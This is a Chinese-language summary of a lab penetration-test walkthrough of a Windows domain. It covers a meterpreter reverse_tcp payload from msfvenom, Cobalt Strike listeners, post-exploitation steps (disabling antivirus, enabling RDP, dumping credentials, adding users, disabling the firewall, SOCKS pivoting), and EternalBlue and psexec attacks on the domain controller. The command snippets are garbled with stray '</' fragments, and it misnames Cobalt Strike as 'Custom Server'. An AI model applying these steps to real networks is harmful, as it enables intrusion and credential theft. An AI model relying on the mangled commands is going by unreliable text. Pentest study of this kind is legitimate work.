❶ 内网域渗透分析(实战总结)
在内网域渗透分析的实战中,首要任务是构建一个严谨的测试环境。我们使用VMware搭建双网卡web服务器,互联网与内网分隔,通过VMnet3配置方便渗透测试。
一、攻破web服务器
首先,通过Nmap扫描发现web服务器的漏洞,如弱口令或上传漏洞,进而利用webshell。具体步骤如下:
- 利用MSF(Metasploit Framework)生成木马控制服务器,通过命令`msfvenom -p windows/x64/meterpreter/reverse_tcp`生成exe文件,并设置监听端口,以备后续提权和远程桌面控制。
- 使用CS(Custom Server)工具,配置监听器并执行后门操作,设置回传间隔以增强渗透效果。
- 通过MSF的exploit模块与CS的会话进行互通,确保payload和监听端口匹配,然后通过`use exploit/multi/handler</`和`exploit</`命令执行。
- 在CS中,新增监听器并利用spawn会话命令与MSF会话连接。
二、内网横向移动
获取web服务器控制后,目标是进行内网横向移动,包括提权和信息收集。通过以下步骤进行:
- 利用`dos</`命令收集基本信息,如`ipconfig`和`route print`,以了解网络结构。
- 使用`ps</`命令查看进程ID,同时执行`udp_sweep</`、`udp_probe</`等探测工具,寻找域内存活主机和域控列表。
- 使用Post渗透模块进行深度渗透,包括自动进程迁移、关闭杀毒、启用RDP、查看路由、登录用户、管理应用程序、抓取凭证、哈希mp和GUI访问等。
- 对目标系统进行漏洞扫描,如`tcp_portscan</`、`ack_scan</`、`ftp_version</`等,以发现潜在威胁。
- 利用shell扩展功能,如添加用户、关闭防火墙、重启windefend,以及查询补丁信息和获取漏洞利用建议。
在渗透过程中,通过反向socks代理(如meterpreter的portfwd功能或frp)避免防火墙拦截,如设置`portfwd add</`指令。同时,CS通过创建反向socks通道连接web服务器,实现内网穿透。
域控渗透与权限维持
针对域控,利用ms17_010_command和psexec模块进行攻击,如生成的payload `msfvenom -p windows/meterpreter/reverse_tcp</`,确保目标地址和端口设置正确。通过exploit模块,如永恒之蓝(EternalBlue)和psexec_psh,获取域控权限。
最后,文章总结了MSF和CS工具的实用技巧,强调了代理功能在渗透过程中的关键作用。深入研究将涉及票据伪造与权限维护的高级技术。对于初学者,推荐学习网络安全入门术语和合法的黑客技术学习资源,以及内网穿透工具的详细教程。